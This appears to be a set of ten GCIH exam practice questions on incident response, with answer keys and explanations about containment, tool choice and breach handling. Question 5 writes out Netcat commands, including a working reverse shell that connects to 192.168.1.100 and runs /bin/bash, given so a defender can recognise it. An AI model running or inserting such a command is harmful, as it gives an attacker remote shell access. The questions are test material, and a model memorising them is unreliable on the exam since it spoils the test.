GCIH Practice Questions: Incident Response and Cyber Investigation Domain


Master the Incident Response and Cyber Investigation Domain

Test your knowledge in the Incident Response and Cyber Investigation domain with these 10 practice questions. Each question is designed to help you prepare for the GCIH certification exam with detailed explanations to reinforce your learning.

Question 1

You receive an alert about potential malware on a workstation. What is the best first step in handling this incident?

A) Immediately shut down the workstation to prevent further damage.

B) Isolate the workstation from the network to prevent spread.

C) Run a full antivirus scan on the workstation.

D) Check the workstation's event logs for suspicious activity.

Correct Answer: B

Explanation: Isolating the workstation from the network (B) is the best first step as it prevents the potential spread of malware while allowing for further investigation. Shutting down the workstation (A) can result in loss of volatile data. Running a full antivirus scan (C) should be done after isolation. Checking event logs (D) is useful but should follow network isolation to prevent further compromise.

Question 2

You suspect a data exfiltration attempt on your network. Which tool would provide the most immediate insights into this activity?

A) Sysinternals Suite

B) Wireshark

C) Nmap

D) Metasploit

Correct Answer: B

Explanation: Wireshark (B) is the best tool for capturing and analyzing network traffic, allowing you to identify unusual data flows indicating exfiltration. Sysinternals Suite (A) is more suited for system-level analysis, not network traffic. Nmap (C) is for network scanning, not traffic analysis. Metasploit (D) is used for penetration testing, not monitoring or analysis.

Question 3

You are the incident handler for an organization that has just detected unusual outbound traffic from a server. What is the best first step to take in response to this incident?

A) Immediately shut down the server to prevent data exfiltration.

B) Conduct a full forensic analysis of the server.

C) Isolate the server from the network to contain the potential threat.

D) Notify all employees about the incident.

Correct Answer: C

Explanation: The best first step is to isolate the server from the network (Option C) to prevent further data exfiltration or spread of the threat. Shutting down the server (Option A) may destroy volatile data, and conducting a full forensic analysis (Option B) is time-consuming and not an immediate containment step. Notifying all employees (Option D) is not a first response action.

Question 4

During an incident response, you receive an alert about potential data exfiltration through a specific server. What is the most effective initial action to take?

A) Immediately shut down the server to prevent further data loss.

B) Capture network traffic using Wireshark for detailed analysis.

C) Review server logs to identify any unauthorized access.

D) Isolate the server from the network to contain the incident.

Correct Answer: D

Explanation: The most effective initial action in this scenario is to isolate the server from the network (Option D) to prevent further data exfiltration and contain the incident. Shutting down the server (Option A) might result in loss of volatile data that could be crucial for the investigation. Capturing network traffic (Option B) and reviewing server logs (Option C) are important but should be done after containment to ensure that the threat is not actively causing more damage.

Question 5

During an incident response investigation, you suspect that a compromised system is being used for data exfiltration through a covert channel. You find evidence of Netcat being used on the system. Which of the following Netcat commands would most likely indicate a reverse shell used for data exfiltration?

A) nc -lvp 4444 -e /bin/bash

B) nc -e /bin/bash 192.168.1.100 4444

C) nc 192.168.1.100 4444 < /dev/null

D) nc -l -p 4444 > output.txt

Correct Answer: B

Explanation: Option B represents a reverse shell initiated by the compromised system, connecting back to the attacker's machine at IP address 192.168.1.100 on port 4444 and executing /bin/bash. This is a common method for establishing a covert channel for data exfiltration. Option A is a listener command, which is not used for initiating a reverse connection. Option C is a simple TCP connection that doesn't execute a shell. Option D is a listener that writes incoming data to a file, not a reverse shell.

Question 6

You are the first responder to a suspected malware infection on a workstation. What is the best first step you should take?

A) Isolate the workstation from the network.

B) Delete the suspicious files.

C) Run a full antivirus scan.

D) Reboot the workstation in safe mode.

Correct Answer: A

Explanation: Isolating the workstation from the network is the best first step as it prevents the potential spread of malware to other systems while preserving the current state for further analysis. Deleting files (Option B) could destroy evidence. Running a full antivirus scan (Option C) is useful but should be done after isolation to prevent further spread. Rebooting in safe mode (Option D) could alter the system state and is not an immediate containment action.

Question 7

An incident handler is tasked with identifying the source of a DDoS attack. Which tool would be most effective for this task?

A) Wireshark

B) Nmap

C) Snort

D) Exiftool

Correct Answer: A

Explanation: Wireshark (A) is effective for capturing and analyzing network traffic, which is crucial in identifying the source of a DDoS attack. Nmap (B) is used for network scanning, not traffic analysis. Snort (C) is an IDS and can detect attacks but is not primarily used for identifying sources. Exiftool (D) is used for metadata extraction from files and is irrelevant in this context.

Question 8

You receive an alert about a possible data breach involving sensitive customer data. What should be your first priority?

A) Contact the affected customers to inform them of the breach.

B) Begin an immediate forensic investigation to confirm the breach.

C) Contain the breach to prevent further data loss.

D) Notify law enforcement of the potential breach.

Correct Answer: C

Explanation: Containing the breach to prevent further data loss is the first priority. This action helps to limit the impact of the breach. Informing customers (Option A) is important but should occur after containment and confirmation. Starting a forensic investigation (Option B) is crucial but should follow containment to ensure the breach does not worsen. Notifying law enforcement (Option D) is typically done after confirming the breach and assessing its scope.

Question 9

After identifying suspicious network traffic, what is the most effective initial tool-based action to investigate further?

A) Use Nmap to scan the network for open ports.

B) Deploy a SIEM solution to monitor network activity.

C) Capture and analyze packets using Wireshark.

D) Set up a honeypot to attract malicious traffic.

Correct Answer: C

Explanation: Capturing and analyzing packets using Wireshark (Option C) is the most effective initial tool-based action to investigate suspicious network traffic. It allows for detailed inspection of the traffic to identify potential threats. Using Nmap (Option A) and setting up a honeypot (Option D) are more proactive measures that do not directly address the immediate analysis need. Deploying a SIEM (Option B) is a long-term strategy and not an immediate action.

Question 10

An alert indicates possible unauthorized access to a critical database. What is the most effective initial action?

A) Change all database passwords immediately.

B) Review database access logs for suspicious activity.

C) Shut down the database server to prevent further access.

D) Inform the database administrator of the alert.

Correct Answer: B

Explanation: Reviewing database access logs (Option B) is the most effective initial action to identify any unauthorized access patterns. Changing passwords (Option A) or shutting down the server (Option C) are premature without understanding the situation. Informing the administrator (Option D) is not a direct response action.
